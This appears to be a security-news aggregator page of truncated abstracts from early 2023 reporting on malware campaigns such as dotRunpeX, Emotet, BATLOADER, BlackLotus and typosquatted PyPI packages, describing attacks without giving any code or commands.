The threat group tracked as REF2924 has been observed deploying previously unseen malware in its attacks aimed at entities in South and Southeast Asia. The malware, dubbed NAPLISTENER by Elastic Security Labs, is an HTTP listener programmed in C# and is designed to evade "network-based forms of detection." REF2924 is the moniker assigned to an activity cluster linked to attacks against an entity in Afghanistan as well as the Foreign Affairs Office of an ASEAN member in 2022. The threat actor's modus operandi suggests overlaps with another hacking group dubbed ChamelGang , which was documented by Russian cybersecurity company Positive Technologies in October 2021. Attacks orchestrated by the group are said to have exploited internet-exposed Microsoft Exchange servers to deploy backdoors such as DOORME, SIESTAGRAPH, and ShadowPad. DOORME, an Internet Information Services ( IIS ) backdoor module, provides remote access to a contested network and executes additThe Hacker News
March 20, 2023
New DotRunpeX Malware Delivers Multiple Malware Families via Malicious Ads Full Text
Abstract
A new piece of malware dubbed dotRunpeX is being used to distribute numerous known malware families such as Agent Tesla , Ave Maria , BitRAT , FormBook , LokiBot , NetWire , Raccoon Stealer , RedLine Stealer , Remcos , Rhadamanthys , and Vidar . "DotRunpeX is a new injector written in .NET using the Process Hollowing technique and used to infect systems with a variety of known malware families," Check Point said in a report published last week. Said to be in active development, dotRunpeX arrives as a second-stage malware in the infection chain, often deployed via a downloader (aka loader) that's transmitted through phishing emails as malicious attachments. Alternatively, it's known to leverage malicious Google Ads on search result pages to direct unsuspecting users searching for popular software such as AnyDesk and LastPass to copycat sites hosting trojanized installers. The latest DotRunpeX artifacts, first spotted in October 2022, add an extra oThe Hacker News
March 20, 2023
Emotet is back after a three-month hiatus Full Text
Abstract
The infamous Emotet malware is back after a short hiatus, threat actors are spreading it via Microsoft OneNote email attachments. The Emotet malware returns after a three-month hiatus and threat actors are distributing it via Microsoft OneNote email...Security Affairs
March 20, 2023
Emotet Rises Again: Evades Macro Security via OneNote Attachments Full Text
Abstract
The notorious Emotet malware, in its return after a short hiatus , is now being distributed via Microsoft OneNote email attachments in an attempt to bypass macro-based security restrictions and compromise systems. Emotet , linked to a threat actor tracked as Gold Crestwood, Mummy Spider, or TA542, continues to be a potent and resilient threat despite attempts by law enforcement to take it down. A derivative of the Cridex banking worm – which was subsequently replaced by Dridex around the same time GameOver Zeus was disrupted in 2014 – Emotet has evolved into a "monetized platform for other threat actors to run malicious campaigns on a pay-per-install (PPI) model, allowing theft of sensitive data and ransom extortion." While Emotet infections have acted as a conduit to deliver Cobalt Strike, IcedID, Qakbot, Quantum ransomware, and TrickBot, its return in late 2021 was facilitated by means of TrickBot. "Emotet is known for extended periods of inaThe Hacker News
March 16, 2023
New dotRunpeX Malware Injector Spotted in the Wild Full Text
Abstract
Check Point Research laid bare tech details of the dotRunpeX injector that delivers a range of known malware families such as AgentTesla, AsyncRat, AveMaria/WarzoneRAT, BitRAT, Formbook, and more. The first-stage loaders are primarily delivered via phishing emails that contain malicious ... Read MoreCyware
March 14, 2023
New Fake ChatGPT Chrome Extension Stealing Facebook Ad Accounts with Thousands of Installs Full Text
Abstract
A Chrome Extension offering quick access to fake ChatGPT functionality was found to be hijacking Facebook accounts and installing hidden account backdoors. Notably, the Facebook app “backdoor” gives the threat actors super-admin permissions.Cyware
March 13, 2023
Golang-based GoBruteforcer Malware Targets Popular Web Services Full Text
Abstract
GoBruteforcer, a new Golang-based botnet, has been seen scanning and infecting well-known web servers including FTP and MySQL, and deploys an IRC bot to communicate. At the time of the attack, GoBruteforcer uses a Classless Inter-Domain Routing (CIDR) block for scanning the network. The best w ... Read MoreCyware
March 13, 2023
Hackers Push BatLoader via Google Search Ads Full Text
Abstract
BATLOADER, the notorious malware loader, was seen exploiting Google Ads to deliver secondary payloads such as Vidar Stealer and Ursnif. In their ads, attackers fake legitimate apps and services such as Adobe, Tableau, ChatGPT, Spotify, and Zoom. Other samples of BATLOADER display enhanced capabilit ... Read MoreCyware
March 13, 2023
Fake ChatGPT Chrome Extension Hijacking Facebook Accounts for Malicious Advertising Full Text
Abstract
A fake ChatGPT-branded Chrome browser extension has been found to come with capabilities to hijack Facebook accounts and create rogue admin accounts, highlighting one of the different methods cyber criminals are using to distribute malware. "By hijacking high-profile Facebook business accounts, the threat actor creates an elite army of Facebook bots and a malicious paid media apparatus," Guardio Labs researcher Nati Tal said in a technical report. "This allows it to push Facebook paid ads at the expense of its victims in a self-propagating worm-like manner." The "Quick access to Chat GPT" extension, which is said to have attracted 2,000 installations per day since March 3, 2023, has since been pulled by Google from the Chrome Web Store as of March 9, 2023. The browser add-on is promoted through Facebook-sponsored posts, and while it offers the ability to connect to the ChatGPT service, it's also engineered to surreptitiously harvest cookies andThe Hacker News
March 13, 2023
Warning: AI-generated YouTube Video Tutorials Spreading Infostealer Malware Full Text
Abstract
Threat actors have been increasingly observed using AI-generated YouTube Videos to spread a variety of stealer malware such as Raccoon, RedLine, and Vidar. "The videos lure users by pretending to be tutorials on how to download cracked versions of software such as Photoshop, Premiere Pro, Autodesk 3ds Max, AutoCAD, and other products that are licensed products available only to paid users," CloudSEK researcher Pavan Karthick M said . Just as the ransomware landscape comprises core developers and affiliates who are in charge of identifying potential targets and actually carrying out the attacks, the information stealer ecosystem also consists of threat actors known as traffers who are recruited to spread the malware using different methods. One of the popular malware distribution channels is YouTube, with CloudSEK witnessing a 200-300% month-over-month increase in videos containing links to stealer malware in the description section. These links are often obfuscated uThe Hacker News
March 11, 2023
BATLOADER Malware Uses Google Ads to Deliver Vidar Stealer and Ursnif Payloads Full Text
Abstract
The malware downloader known as BATLOADER has been observed abusing Google Ads to deliver secondary payloads like Vidar Stealer and Ursnif. According to cybersecurity company eSentire , malicious ads are used to spoof a wide range of legitimate apps and services such as Adobe, OpenAPI's ChatGPT, Spotify, Tableau, and Zoom. BATLOADER , as the name suggests, is a loader that's responsible for distributing next-stage malware such as information stealers, banking malware, Cobalt Strike, and even ransomware. One of the key traits of the BATLOADER operations is the use of software impersonation tactics for malware delivery. This is achieved by setting up lookalike websites that host Windows installer files masquerading as legitimate apps to trigger the infection sequence when a user searching for the software clicks a rogue ad on the Google search results page. These MSI installer files, when launched, execute Python scripts that contain the BATLOADER payload to retrieve tThe Hacker News
March 11, 2023
PlugX malware delivered by exploiting flaws in Chinese programs Full Text
Abstract
Researchers observed threat actors deploying PlugX malware by exploiting flaws in Chinese remote control programs Sunlogin and Awesun. Researchers at ASEC (AhnLab Security Emergency response Center) observed threat actors deploying the PlugX malware...Security Affairs
March 10, 2023
Latest version of Xenomorph Android malware targets 400 banks Full Text
Abstract
A new version of the Xenomorph Android malware includes a new automated transfer system framework and targets 400 banks. The author of the Xenomorph Android malware, the Hadoken Security Group, continues to improve their malicious code. In February...Security Affairs
March 10, 2023
Xenomorph Android Banking Trojan Returns with a New and More Powerful Variant Full Text
Abstract
A new variant of the Android banking trojan named Xenomorph has surfaced in the wild, latest findings from ThreatFabric reveal. Named " Xenomorph 3rd generation " by the Hadoken Security Group, the threat actor behind the operation, the updated version comes with new features that allow it to perform financial fraud in a seamless manner. "This new version of the malware adds many new capabilities to an already feature-rich Android banker, most notably the introduction of a very extensive runtime engine powered by Accessibility services, which is used by actors to implement a complete ATS framework ," the Dutch security firm said in a report shared with The Hacker News. Xenomorph first came to light a year ago in February 2022, when it was found to target 56 European banks through dropper apps published on the Google Play Store. In contrast, the latest iteration of the banker – which has a dedicated website advertising its features – is designed to targeThe Hacker News
March 9, 2023
OneNote Used as New Distribution Channel for Qakbot Malware Full Text
Abstract
Researchers observed a notable spike in emails utilizing malicious OneNote attachments, especially to drop Qakbot or QBot. Operators have apparently reorganized its infrastructure to target specific regions and industries.Cyware
March 9, 2023
Beware! AI Generates a Truly Polymorphic Malware BlackMamba Full Text
Abstract
A BlackMamba proof-of-concept attack was demonstrated by researchers. The technology on which ChatGPT is built, the large language model (LLM), was used to create a polymorphic keylogger functionality on the fly. The malware was tested against a renowned EDR system and resulted in absolutely no ale ... Read MoreCyware
March 8, 2023
Qakbot Strikes Again With New Delivery Method; Puts Millions of Devices at Risk Full Text
Abstract
Researchers at Trellix Advanced Research Center have detected various campaigns that use OneNote documents to distribute Qakbot and other malware such as AsyncRAT, Icedid, and XWorm.Cyware
March 8, 2023
SYS01 Campaign Uses Multiple Attack Evasion Tactics; Stayed Invisible for Five Months Full Text
Abstract
Morphisec researchers have been tracking this info-stealer since November 2022. This campaign uses lures and loading tactics similar to another info-stealer named S1deload, however, the final payload delivered is different.Cyware
March 7, 2023
New SYS01stealer Threat Uses Facebook Ads to Target Critical Infrastructure Firms Full Text
Abstract
Morphisec has tracked an advanced info-stealer called SYS01stealer since November 2022. It uses similar lures and loading techniques to another information stealer recently named S1deload by Bitdefender, but the actual payload is different.Cyware
March 07, 2023
SYS01stealer: New Threat Using Facebook Ads to Target Critical Infrastructure Firms Full Text
Abstract
Cybersecurity researchers have discovered a new information stealer dubbed SYS01stealer targeting critical government infrastructure employees, manufacturing companies, and other sectors. "The threat actors behind the campaign are targeting Facebook business accounts by using Google ads and fake Facebook profiles that promote things like games, adult content, and cracked software, etc. to lure victims into downloading a malicious file," Morphisec said in a report shared with The Hacker News. "The attack is designed to steal sensitive information, including login data, cookies, and Facebook ad and business account information." The Israeli cybersecurity company said the campaign was initially tied to a financially motivated cybercriminal operation dubbed Ducktail by Zscaler. However, WithSecure, which first documented the Ducktail activity cluster in July 2022, said the two intrusion sets are different from one another, indicating how the threat actorsThe Hacker News
March 7, 2023
Expert released PoC exploit code for critical Microsoft Word RCE flaw Full Text
Abstract
Security researcher released a proof-of-concept exploit code for a critical flaw, tracked as CVE-2023-21716, in Microsoft Word. Security researcher Joshua Drake released a proof-of-concept for a critical vulnerability, tracked as CVE-2023-21716 (CVSS...Security Affairs
March 07, 2023
Shein’s Android App Caught Transmitting Clipboard Data to Remote Servers Full Text
Abstract
An older version of Shein's Android application suffered from a bug that periodically captured and transmitted clipboard contents to a remote server. The Microsoft 365 Defender Research Team said it discovered the problem in version 7.9.2 of the app that was released on December 16, 2021. The issue has since been addressed as of May 2022. Shein, originally named ZZKKO, is a Chinese online fast fashion retailer based in Singapore. The app, which is currently at version 9.0.0, has over 100 million downloads on the Google Play Store. The tech giant said it's not "specifically aware of any malicious intent behind the behavior," but noted that the function isn't necessary to perform tasks on the app. It further pointed out that launching the application after copying any content to the device clipboard automatically triggered an HTTP POST request containing the data to the server "api-service[.]shein[.]com." To mitigate such privacy risks, GooThe Hacker News
March 06, 2023
New HiatusRAT Malware Targets Business-Grade Routers to Covertly Spy on Victims Full Text
Abstract
A never-before-seen complex malware is targeting business-grade routers to covertly spy on victims in Latin America, Europe, and North America at least since July 2022. The elusive campaign, dubbed Hiatus by Lumen Black Lotus Labs, has been found to deploy two malicious binaries, a remote access trojan dubbed HiatusRAT and a variant of tcpdump that makes it possible to capture packet capture on the target device. "Once a targeted system is infected, HiatusRAT allows the threat actor to remotely interact with the system, and it utilizes prebuilt functionality [...] to convert the compromised machine into a covert proxy for the threat actor," the company said in a report shared with The Hacker News. "The packet-capture binary enables the actor to monitor router traffic on ports associated with email and file-transfer communications." The threat cluster primarily singles out end-of-life (EoL) DrayTek Vigor router models 2960 and 3900, with approximately 100The Hacker News
March 6, 2023
New Feature-Rich Post-Exploitation Tool ‘Exfiltrator-22’ Linked With LockBit Full Text
Abstract
Hackers in the underground marketplace have introduced a new Exfiltrator-22, or EX-22, post-exploitation framework. According to the CYFIRMA team, LockBit 3.0 affiliates or its members are most probably behind its development. The developers have used the same C2 infrastructure previously exposed i ... Read MoreCyware
March 6, 2023
Colour-Blind, a fully featured info stealer and RAT in PyPI Full Text
Abstract
Experts discovered a fully featured information stealer, tracked as 'Colour-Blind' in the Python Package Index (PyPI). Researchers from Kroll's Cyber Threat Intelligence team discovered a malicious Python package uploaded to the Python Package Index...Security Affairs
March 04, 2023
New FiXS ATM Malware Targeting Mexican Banks Full Text
Abstract
A new ATM malware strain dubbed FiXS has been observed targeting Mexican banks since the start of February 2023. "The ATM malware is hidden inside another not-malicious-looking program," Latin American cybersecurity firm Metabase Q said in a report shared with The Hacker News. Besides requiring interaction via an external keyboard, the Windows-based ATM malware is also vendor-agnostic and is capable of infecting any teller machine that supports CEN/XFS (short for eXtensions for Financial Services). The exact mode of compromise remains unknown but Metabase Q's Dan Regalado told The Hacker News that it's likely that "attackers found a way to interact with the ATM via touchscreen." FiXS is also said to be similar to another strain of ATM malware codenamed Ploutus that has enabled cybercriminals to extract cash from ATMs by using an external keyboard or by sending an SMS message . One of the notable characteristics of FiXS is its ability to dispThe Hacker News
March 4, 2023
FiXS, a new ATM malware that is targeting Mexican banks Full Text
Abstract
Researchers at Metabase Q discovered a new ATM malware, dubbed FiXS, that was employed in attacks against Mexican banks since February 2023. Researchers at Metabase Q recently spotted a new ATM malware, dubbed FiXS, that is currently targeting Mexican...Security Affairs
March 3, 2023
Mustang Panda’s Latest ‘MQsTTang’ Backdoor Treads New Ground With Qt and MQTT Full Text
Abstract
This backdoor is part of an ongoing campaign that researchers can trace back to early January 2023. Unlike most of the group’s malware, MQsTTang doesn’t seem to be based on existing families or publicly available projects.Cyware
March 02, 2023
Experts Identify Fully-Featured Info Stealer and Trojan in Python Package on PyPI Full Text
Abstract
A malicious Python package uploaded to the Python Package Index (PyPI) has been found to contain a fully-featured information stealer and remote access trojan. The package, named colourfool , was identified by Kroll's Cyber Threat Intelligence team, with the company calling the malware Colour-Blind . "The 'Colour-Blind' malware points to the democratization of cybercrime that could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others," Kroll researchers Dave Truman and George Glass said in a report shared with The Hacker News. colourfool, like other rogue Python modules discovered in recent months, conceals its malicious code in the setup script, which points to a ZIP archive payload hosted on Discord. The file contains a Python script (code.py) that comes with different modules designed to log keystrokes, steal cookies, and even disable security software. The malware, besides performing defense evThe Hacker News
March 02, 2023
SysUpdate Malware Strikes Again with Linux Version and New Evasion Tactics Full Text
Abstract
The threat actor known as Lucky Mouse has developed a Linux version of a malware toolkit called SysUpdate, expanding on its ability to target devices running the operating system. The oldest version of the updated artifact dates back to July 2022, with the malware incorporating new features designed to evade security software and resist reverse engineering. Cybersecurity company Trend Micro said it observed the equivalent Windows variant in June 2022, nearly one month after the command-and-control (C2) infrastructure was set up. Lucky Mouse is also tracked under the monikers APT27, Bronze Union, Emissary Panda, and Iron Tiger, and is known to utilize a variety of malware such as SysUpdate , HyperBro, PlugX, and a Linux backdoor dubbed rshell. Over the past two years, campaigns orchestrated by the threat group have embraced supply chain compromises of legitimate apps like Able Desktop and MiMi Chat to obtain remote access to compromised systems. In October 2022, IntrinThe Hacker News
March 2, 2023
R3NIN Sniffer Malware Stealing Credit Card Data From E-Commerce Consumers Full Text
Abstract
In the event of a website being hacked, attackers may implant an encoded malicious script into the web server, designed to activate when a target user accesses the corrupted web page.Cyware
March 01, 2023
BlackLotus Becomes First UEFI Bootkit Malware to Bypass Secure Boot on Windows 11 Full Text
Abstract
A stealthy Unified Extensible Firmware Interface (UEFI) bootkit called BlackLotus has become the first publicly known malware capable of bypassing Secure Boot defenses, making it a potent threat in the cyber landscape. "This bootkit can run even on fully up-to-date Windows 11 systems with UEFI Secure Boot enabled," Slovak cybersecurity company ESET said in a report shared with The Hacker News. UEFI bootkits are deployed in the system firmware and allow full control over the operating system (OS) boot process, thereby making it possible to disable OS-level security mechanisms and deploy arbitrary payloads during startup with high privileges. Offered for sale at $5,000 (and $200 per new subsequent version), the powerful and persistent toolkit is programmed in Assembly and C and is 80 kilobytes in size. It also features geofencing capabilities to avoid infecting computers in Armenia, Belarus, Kazakhstan, Moldova, Romania, Russia, and Ukraine. Details about BlackLotus fThe Hacker News
March 1, 2023
BlackLotus is the first bootkit bypassing UEFI Secure Boot on Windows 11 Full Text
Abstract
ESET discovered a stealthy Unified Extensible Firmware Interface (UEFI) bootkit dubbed BlackLotus that is able to bypass the Secure Boot on Windows 11. Researchers from ESET discovered a new stealthy Unified Extensible Firmware Interface (UEFI) bootkit,...Security Affairs
March 1, 2023
Iron Tiger’s SysUpdate Reappears, Adds Linux Targeting Full Text
Abstract
In 2022, Trend Micro researchers noticed that they updated SysUpdate, one of their custom malware families, to include new features and add malware infection support for the Linux platform.Cyware
March 01, 2023
Parallax RAT Targeting Cryptocurrency Firms with Sophisticated Injection Techniques Full Text
Abstract
Cryptocurrency companies are being targeted as part of a new campaign that delivers a remote access trojan called Parallax RAT. The malware "uses injection techniques to hide within legitimate processes, making it difficult to detect," Uptycs said in a new report. "Once it has been successfully injected, attackers can interact with their victim via Windows Notepad that likely serves as a communication channel." Parallax RAT grants attackers remote access to victim machines. It comes with features to upload and download files as well as record keystrokes and screen captures. It has been put to use since early 2020 and was previously delivered via COVID-19-themed lures. In February 2022, Proofpoint detailed an activity cluster dubbed TA2541 targeting aviation, aerospace, transportation, manufacturing, and defense industries using different RATs, including Parallax. The first payload is a Visual C++ malware that employs the process hollowing technique toThe Hacker News
February 27, 2023
Researchers Share New Insights Into RIG Exploit Kit Malware’s Operations Full Text
Abstract
The RIG exploit kit (EK) touched an all-time high successful exploitation rate of nearly 30% in 2022, new findings reveal. "RIG EK is a financially-motivated program that has been active since 2014," Swiss cybersecurity company PRODAFT said in an exhaustive report shared with The Hacker News. "Although it has yet to substantially change its exploits in its more recent activity, the type and version of the malware they distribute constantly change. The frequency of updating samples ranges from weekly to daily updates." Exploit kits are programs used to distribute malware to large numbers of victims by taking advantage of known security flaws in commonly-used software such as web browsers. The fact that RIG EK runs as a service model means threat actors can financially compensate the RIG EK administrator for installing malware of their choice on victim machines. The RIG EK operators primarily employ malvertising to ensure a high infection rate and large-scaleThe Hacker News
February 27, 2023
Attackers Abuse SM Platforms to Deliver S1deload Stealer Full Text
Abstract
Bitdefender disclosed an active malware campaign targeting Facebook and YouTube users with S1deload Stealer, using adult themes as bait. The new information stealer compromises user credentials and exploits system resources to mine BEAM cryptocurrency. The malware has the ability to propagate its m ... Read MoreCyware
February 27, 2023
PlugX Trojan disguised as a legitimate Windows open-source tool in recent attacks Full Text
Abstract
Researchers detailed a new wave of attacks distributing the PlugX RAT disguised as a legitimate Windows debugger tool. Trend Micro uncovered a new wave of attacks aimed at distributing the PlugX remote access trojan masqueraded as an open-source...Security Affairs
February 27, 2023
TA569: SocGholish and Beyond Full Text
Abstract
TA569 leverages many types of injections, traffic distribution systems (TDS), and payloads including, but not limited to, SocGholish. In addition to serving as an initial access broker, these injects imply it may be running a pay-per-install service.Cyware
February 27, 2023
Wiper malware goes global, destructive attacks surge Full Text
Abstract
The threat landscape and organizations’ attack surfaces are constantly transforming, and cybercriminals’ ability to design and adapt their techniques to suit this evolving environment continues to pose significant risks to all businesses.Cyware
February 27, 2023
ChromeLoader Malware Targeting Gamers via Fake Nintendo and Steam Game Hacks Full Text
Abstract
A new ChromeLoader malware campaign has been observed being distributed via virtual hard disk (VHD) files, marking a deviation from the ISO optical disc image format. "These VHD files are being distributed with filenames that make them appear like either hacks or cracks for Nintendo and Steam games," AhnLab Security Emergency response Center (ASEC) said in a report last week. ChromeLoader (aka Choziosi Loader or ChromeBack) originally surfaced in January 2022 as a browser-hijacking credential stealer but has since evolved into a more potent, multifaceted threat capable of stealing sensitive data, deploying ransomware, and even dropping decompression bombs . The primary goal of the malware is to compromise web browsers like Google Chrome, and modify the browser settings to intercept and direct traffic to dubious advertising websites. What's more, ChromeLoader has emerged as a conduit to carry out click fraud by leveraging a browser extension to monetize clThe Hacker News
February 27, 2023
PureCrypter used to deliver AgentTesla to govt organizations Full Text
Abstract
An unknown threat actor is targeting government organizations with the PureCrypter downloader, Menlo Security firm reported. Menlo Labs researchers uncovered an unknown threat actor is using the PureCrypter downloader in attacks aimed at government...Security Affairs
February 27, 2023
DarkCloud Stealer Targets Users and Businesses Worldwide Full Text
Abstract
Hackers were found distributing sophisticated DarkCloud Stealer info-stealer through various spam campaigns. The malware operates through a multi-stage process and is capable of collecting sensitive information from a victim’s computer or mobile device. The malware operators claim to target applica ... Read MoreCyware
February 24, 2023
PureCrypter Malware Downloader Targets Government Entities Through Discord Full Text
Abstract
Menlo Labs has uncovered an unknown threat actor that’s leveraging an evasive threat campaign distributed via Discord that features the PureCrypter downloader and targets government entities.Cyware
February 23, 2023
Imposter HTTP libraries lurk on PyPI Full Text
Abstract
The descriptions for these packages, for the most part, don't hint at their malicious intent. Some are disguised as real libraries and make flattering comparisons between their capabilities and those of known, legitimate HTTP libraries.Cyware
February 23, 2023
Lazarus Group Likely Using New WinorDLL64 Backdoor to Exfiltrate Sensitive Data Full Text
Abstract
A new backdoor associated with a malware downloader named Wslink has been discovered, with the tool likely used by the notorious North Korea-aligned Lazarus Group, new findings reveal. The payload, dubbed WinorDLL64 by ESET, is a fully-featured implant that can exfiltrate, overwrite, and delete files; execute PowerShell commands; and obtain comprehensive information about the underlying machine. Its other features comprise listing active sessions, creating and terminating processes, enumerating drives, and compressing directories. Wslink was first documented by the Slovak cybersecurity firm in October 2021, describing it as a "simple yet remarkable" malware loader that's capable of executing received modules in memory. "The Wslink payload can be leveraged later for lateral movement, due to its specific interest in network sessions," ESET researcher Vladislav Hrčka said . "The Wslink loader listens on a port specified in the configuration and canThe Hacker News
February 23, 2023
New S1deload Malware Hijacking Users’ Social Media Accounts and Mining Cryptocurrency Full Text
Abstract
An active malware campaign has set its sights on Facebook and YouTube users by leveraging a new information stealer to hijack the accounts and abuse the systems' resources to mine cryptocurrency. Bitdefender is calling the malware S1deload Stealer for its use of DLL side-loading techniques to get past security defenses and execute its malicious components. "Once infected, S1deload Stealer steals user credentials, emulates human behavior to artificially boost videos and other content engagement, assesses the value of individual accounts (such as identifying corporate social media admins), mines for BEAM cryptocurrency, and propagates the malicious link to the user's followers," Bitdefender researcher Dávid ÁCS said . Put differently, the goal of the campaign is to take control of the users' Facebook and YouTube accounts and rent out access to raise view counts and likes for videos and posts shared on the platforms. More than 600 unique users are estimateThe Hacker News
February 23, 2023
Python Developers Warned of Trojanized PyPI Packages Mimicking Popular Libraries Full Text
Abstract
Cybersecurity researchers are warning of "imposter packages" mimicking popular libraries available on the Python Package Index (PyPI) repository. The 41 malicious PyPI packages have been found to pose as typosquatted variants of legitimate modules such as HTTP, AIOHTTP, requests, urllib, and urllib3. The names of the packages are as follows: aio5, aio6, htps1, httiop, httops, httplat, httpscolor, httpsing, httpslib, httpsos, httpsp, httpssp, httpssus, httpsus, httpxgetter, httpxmodifier, httpxrequester, httpxrequesterv2, httpxv2, httpxv3, libhttps, piphttps, pohttp, requestsd, requestse, requestst, ulrlib3, urelib3, urklib3, urlkib3, urllb, urllib33, urolib3, xhttpsp "The descriptions for these packages, for the most part, don't hint at their malicious intent," ReversingLabs researcher Lucija Valentić said in a new writeup. "Some are disguised as real libraries and make flattering comparisons between their capabilities and those of known, legitimateThe Hacker News
February 21, 2023
PoC exploit code for critical Fortinet FortiNAC bug released online Full Text
Abstract
Researchers released a proof-of-concept exploit code for the critical CVE-2022-39952 vulnerability in the Fortinet FortiNAC network access control solution. Researchers at Horizon3 cybersecurity firm have released a proof-of-concept exploit for a critical-severity...Security Affairs
February 21, 2023
Researchers Discover Numerous Samples of Information Stealer ‘Stealc’ in the Wild Full Text
Abstract
A new information stealer called Stealc that's being advertised on the dark web could emerge as a worthy competitor to other malware of its ilk. "The threat actor presents Stealc as a fully featured and ready-to-use stealer, whose development relied on Vidar , Raccoon , Mars , and RedLine stealers," SEKOIA said in a Monday report. The French cybersecurity company said it discovered more than 40 Stealc samples distributed in the wild and 35 active command-and-control (C2) servers, suggesting that the malware is already gaining traction among criminal groups. Stealc, first marketed by an actor named Plymouth on the XSS and BHF Russian-speaking underground forums on January 9, 2023, is written in C and comes with capabilities to steal data from web browsers, crypto wallets, email clients, and messaging apps. The malware-as-a-service (MaaS) also boasts of a "customizable" file grabber that allows its buyers to tailor the module to siphon files oThe Hacker News
February 21, 2023
Stealc, a new advanced infostealer appears in the threat landscape Full Text
Abstract
Researchers spotted a new information stealer, called Stealc, which supports a wide set of stealing capabilities. In January 2023, researchers at SEKOIA.IO discovered a new information stealer, dubbed Stealc, which was advertised in the dark web forums....Security Affairs
February 21, 2023
Researchers Warn of ReverseRAT Backdoor Targeting Indian Government Agencies Full Text
Abstract
A spear-phishing campaign targeting Indian government entities aims to deploy an updated version of a backdoor called ReverseRAT . Cybersecurity firm ThreatMon attributed the activity to a threat actor tracked as SideCopy . SideCopy is a threat group of Pakistani origin that shares overlaps with another actor called Transparent Tribe . It is so named for mimicking the infection chains associated with SideWinder to deliver its own malware. The adversarial crew was first observed delivering ReverseRAT in 2021, when Lumen's Black Lotus Labs detailed a set of attacks targeting victims aligned with the government and power utility verticals in India and Afghanistan. Recent attack campaigns associated with SideCopy have primarily set their sights on a two-factor authentication solution known as Kavach (meaning "armor" in Hindi) that's used by Indian government officials. The infection journey documented by ThreatMon commences with a phishing email containiThe Hacker News
February 19, 2023
Havoc Replaces Cobalt Strike and Brute Ratel Full Text
Abstract
Threat actors have been switching to a new open-source C2 framework, dubbed Havoc, as an alternative to Brute Ratel and Cobalt Strike - stated researchers. The advanced post-exploitation C2 framework can bypass even the most updated version of Windows 11 Defender. An unknown threat group dropp ... Read MoreCyware
February 19, 2023
Frebniis malware abuses Microsoft IIS feature to create a backdoor Full Text
Abstract
Experts spotted a malware dubbed Frebniis that abuses a Microsoft IIS feature to deploy a backdoor and monitor all HTTP traffic to the system. Broadcom Symantec researchers have spotted a new malware, tracked as Frebniis, that abuses Microsoft Internet...Security Affairs
February 18, 2023
New Frebniis Malware Abuses IIS Features for Secret Communications Full Text
Abstract
There’s a new malware threat to Microsoft Internet Information Services (IIS) servers dubbed Frebniss. Discovered by Symantec's Threat Hunter Team, the malware abuse 'Failed Request Event Buffering' (FREB) feature of IIS that is responsible for collecting request metadata such as IP addresses, HTTP ... Read MoreCyware
February 17, 2023
Experts Warn of RambleOn Android Malware Targeting South Korean Journalists Full Text
Abstract
Suspected North Korean nation-state actors targeted a journalist in South Korea with a malware-laced Android app as part of a social engineering campaign. The findings come from South Korea-based non-profit Interlab, which coined the new malware RambleOn . The malicious functionalities include the "ability to read and leak target's contact list, SMS, voice call content, location and others from the time of compromise on the target," Interlab threat researcher Ovi Liber said in a report published this week. The spyware camouflages as a secure chat app called Fizzle (ch.seme), but in reality, acts as a conduit to deliver a next-stage payload hosted on pCloud and Yandex. The chat app is said to have been sent as an Android Package (APK) file over WeChat to the targeted journalist on December 7, 2022, under the pretext of wanting to discuss a sensitive topic. The primary purpose of RambleOn is to function as a loader for another APK file ( com.data.WeCoin ) whileThe Hacker News
February 17, 2023
New Frebniis Malware Abuses Microsoft IIS Feature to Establish Backdoor Full Text
Abstract
Frebniis ensures Failed Request Tracing is enabled and then accesses w3wp.exe (IIS) process memory, obtaining the address of where the Failed Request Event Buffering code (iisfreb.dll) is loaded.Cyware
February 15, 2023
Beep, a new highly evasive malware appeared in the threat landscape Full Text
Abstract
Experts detected a new evasive malware dubbed Beep, it implements many anti-debugging and anti-sandbox techniques. Researchers from Minerva recently discovered a new evasive malware dubbed Beep, which implements many anti-debugging and anti-sandbox...Security Affairs
February 15, 2023
Experts Warn of ‘Beep’ - A New Evasive Malware That Can Fly Under the Radar Full Text
Abstract
Cybersecurity researchers have unearthed a new piece of evasive malware dubbed Beep that's designed to fly under the radar and drop additional payloads onto a compromised host. "It seemed as if the authors of this malware were trying to implement as many anti-debugging and anti-VM (anti-sandbox) techniques as they could find," Minerva Labs researcher Natalie Zargarov said . "One such technique involved delaying execution through the use of the Beep API function , hence the malware's name." Beep comprises three components, the first of which is a dropper that's responsible for creating a new Windows Registry key and executing a Base64-encoded PowerShell script stored in it. The PowerShell script, for its part, reaches out to a remote server to retrieve an injector, which, after confirming it's not being debugged or launched in a virtual machine, extracts and launches the payload via a technique called process hollowing . The payload is anThe Hacker News
February 14, 2023
Python Developers Beware: Clipper Malware Found in 450+ PyPI Packages! Full Text
Abstract
Malicious actors have published more than 451 unique Python packages on the official Python Package Index (PyPI) repository in an attempt to infect developer systems with clipper malware . Software supply chain security company Phylum, which spotted the libraries , said the ongoing activity is a follow-up to a campaign that was initially disclosed in November 2022. The initial vector entails using typosquatting to mimic popular packages such as beautifulsoup, bitcoinlib, cryptofeed, matplotlib, pandas, pytorch, scikit-learn, scrapy, selenium, solana, and tensorflow, among others. "After installation, a malicious JavaScript file is dropped to the system and executed in the background of any web browsing session," Phylum said in a report published last year. "When a developer copies a cryptocurrency address, the address is replaced in the clipboard with the attacker's address." This is achieved by creating a Chromium web browser extension in the WindowThe Hacker News
February 14, 2023
Experts discover over 451 clipper malware-laced packages in the PyPI repository Full Text
Abstract
Threat actors published more than 451 unique malware-laced Python packages on the official Python Package Index (PyPI) repository. Phylum researchers spotted more than 451 unique Python packages on the official Python Package Index (PyPI) repository...Security Affairs
February 14, 2023
Enigma info-stealing malware targets the cryptocurrency industry Full Text
Abstract
Alleged Russian threat actors have been targeting cryptocurrency users in Eastern Europe with Enigma info-stealing malware. A malware campaign conducted by alleged Russian threat actors has been targeting users in Eastern European in the crypto industry....Security Affairs
February 10, 2023
Researchers Uncover Obfuscated Malicious Code in PyPI Python Packages Full Text
Abstract
Four different rogue packages in the Python Package Index ( PyPI ) have been found to carry out a number of malicious actions, including dropping malware, deleting the netstat utility, and manipulating the SSH authorized_keys file. The packages in question are aptx , bingchilling2 , httops , and tkint3rs , all of which were collectively downloaded about 450 times before they were taken down. While aptx is an attempt to impersonate Qualcomm's highly popular audio codec of the same name, httops and tkint3rs are typosquats of https and tkinter, respectively. "Most of these packages had well thought out names, to purposely confuse people," Security researcher and journalist Ax Sharma said . An analysis of the malicious code injected in the setup script reveals the presence of an obfuscated Meterpreter payload that's disguised as " pip ," a legitimate package installer for Python, and can be leveraged to gain shell access to the infected host. AlsoThe Hacker News
February 10, 2023
